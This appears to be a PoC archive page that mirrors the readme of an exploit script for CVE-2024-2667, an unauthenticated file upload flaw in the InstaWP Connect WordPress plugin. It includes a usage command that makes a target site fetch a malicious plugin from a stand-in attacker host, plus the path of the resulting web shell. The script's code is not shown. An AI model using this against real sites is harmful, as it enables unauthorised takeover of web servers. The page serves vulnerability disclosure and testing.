Goal Reached Thanks to every supporter โ€” we hit 100%!

Goal: 1000 CNY ยท Raised: 1359 CNY

100%

CVE-2024-2667 PoC โ€” InstaWP Connect โ€“ 1-click WP Staging & Migration <= 0.1.0.22 - Unauthenticated Arbitrary File Upload

Source
Associated Vulnerability
Title: InstaWP Connect โ€“ 1-click WP Staging & Migration <= 0.1.0.22 - Unauthenticated Arbitrary File Upload (CVE-2024-2667)
Description:The InstaWP Connect โ€“ 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.
Readme
# CVE-2024-2667-Poc ๐Ÿš€

## Description
The InstaWP Connect โ€“ 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

# Script Usage Guide โš™๏ธ

### Install Requirements
| Description                                | Details                                                                                     | Icon  |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Install Required Libraries                 | Use `pip` to install the necessary Python libraries: `requests` and `beautifulsoup4`.      | ๐Ÿ› ๏ธ   |
| Command to Install                         | Run: `pip install requests beautifulsoup4`.                                                | ๐Ÿ“ฅ   |

### Run the Script
| Description                                | Details                                                                                     | Icon  |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Execute the Script                         | Run the script using the command line with required arguments.                              | ๐Ÿš€   |
| Required Arguments                         | - `-up`: Plugin URL (e.g., `http://attacker-domain/malicious-plugin.zip`).                  |
|                                            | - `-u`: Target WordPress URL (e.g., `http://victim-domain/`).                               | ๐Ÿ”ง   |
| Example Command                            | `python CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/`   | ๐Ÿ“œ   |

### Check Vulnerability
| Description                                | Details                                                                                     | Icon  |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Version Check                              | The script examines the `readme.txt` file for the version of the target plugin.             | ๐Ÿ”   |
| Vulnerable Version                         | If the version is `<= 0.1.0.22`, the script prints: `The site is vulnerable.`              | โš ๏ธ   |
| Safe Version                                | If the version is `> 0.1.0.22`, the script prints: `The site is not vulnerable.`            | โœ…   |


###  Shell Location
| Description                                | Details                                                                                     | Icon  |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Shell Path                                 | If the upload is successful, the shell will be accessible at:                               | ๐Ÿš   |
|                                            | `wp-content/plugins/instawp-connect/shell.php`.                                             |








### usage -help
```
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET

The InstaWP Connect โ€“ 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

options:
  -h, --help            show this help message and exit
  -up URL_PLUGIN, --url_plugin URL_PLUGIN
                        URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
  -u URL_TARGET, --url_target URL_TARGET
                        URL of the target WordPress site (e.g., http://victim-domain/).
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers โ€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online โ€” thank you for the support. View subscription plans โ†’